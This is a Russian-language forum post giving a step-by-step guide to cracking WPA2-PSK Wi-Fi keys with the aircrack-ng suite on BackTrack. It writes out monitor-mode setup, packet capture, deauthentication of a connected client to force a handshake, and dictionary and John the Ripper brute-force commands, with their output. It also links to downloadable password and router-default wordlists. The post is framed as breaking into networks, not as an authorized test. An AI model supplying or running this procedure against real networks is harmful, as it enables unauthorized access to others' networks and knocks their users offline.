kozel747
Новичок
Сообщений: 43
|
|
« Ответ #8 : 28 Ноября 2010, 00:22:52 »
|
|
взлом WPA.
Я буду использовать Dlink DWL-G122 (USB), беспроводной сетевой интерфейс для этой процедуры. В backtrack4, это устройство признано wlan0.
Во-первых, поставить карту в режиме мониторинга:
...............................................................
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
...............................................................
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
................................................................
Хорошо, теперь мы можем использовать интерфейс mon0
Давайте найдём беспроводную сеть, которая использует WPA2 / PSK
.................................................................
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
.....................................................................
Остановим airodump-ng (ctrl+c) и запустим его снова,что-бы записать все пакеты на диск
.....................................................................
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
........................................................................
На данный момент, у вас есть 2 варианта: либо ждать, пока клиент подключится и 4-handshake будет полным, или deauthenticate существующих клиентов и таким образом заставить AP reassociate. Время-деньги, так что давайте заставим силой deauthenticate. Мы должны запустить aireplay-ng введя BSSID ЗС (-а) и МАС подключенного клиента (-с)
.........................................................................
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
.............................................................................
Как результат, airodump-ng укажeт "WPA Handshake:" в верхнем правом углу
..............................................................................
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
................................................................................
Остановитe airodump-ng и убедитесь, что файлы были созданы правильно
...............................................................................
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
................................................................................
Есть 2 способа bruteforcing: один, который относительно быстр, но не гарантирует успеха и тот, который идет очень медленно, но гарантирует, что вы найдете ключ через определенный момент времени.
Первый вариант является использованием рабочего списка / dictionary file. Многие из этих файлов можно найти в Интернете, либо могут быть получены с помощью таких инструментов, как John the Ripper. Как только список слов будет создан, все что вам нужно сделать, это запустить Aircrack-ng подставив файл с Handshake и словарь word.txt
................................................................................
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
--------------------------------------------------------------------------------
Второй метод (bruteforcing) будет успешным наверняка, но это может занять много времени , чтобы закончить. Имейте в виду, WPA2 ключ может быть до 64 символов, так что в теории что-бы построить все сочетания паролей со всеми возможными наборами символов и скормить их в Aircrack займёт много времени. Если вы хотите использовать John The Ripper для создания всех возможных комбинаций паролей и скормить их в Aircrack-NG, это команда для использования:
..................................................................................
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
.................................................................................
каждый символ в ключе может иметь 26 +26 +10 (62) возможных комбинаций. Так максимальное число комбинаций, которое должно быть проверено в процессе перебора 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 около 600 ключей в секунду на моем "медленном" аппарате, может занять более 101083382 часов, чтобы найти ключ (11539 года). Так что думайте об этом, когда ломаете WPA
----------------------------------------------------------------------------------------------------------------
вот вам в помощь несколько словарей
ComboFile http://turbobit.net/m15prul3v4vt.html
de-ice.net-1.110-1.0 http://turbobit.net/8jsypdjdkctf.html
de-ice.net-1.100-1.1 http://turbobit.net/ej38m25xhrmt.html
de-ice.net-2.100-1.1.part1 http://turbobit.net/0g2yjp1y77df.html
de-ice.net-2.100-1.1.part2 http://turbobit.net/7cbyz8sxarh7.html
роутеры и модемы Password List 2010-02-04 http://turbobit.net/fomdazyfg5ou.html
theargonlistver1 http://turbobit.net/kjf1h2eoyb46.html
webster-dictionary http://turbobit.net/2xhh12xca0cy.html
wpalist http://turbobit.net/700uk6nvpren.html
|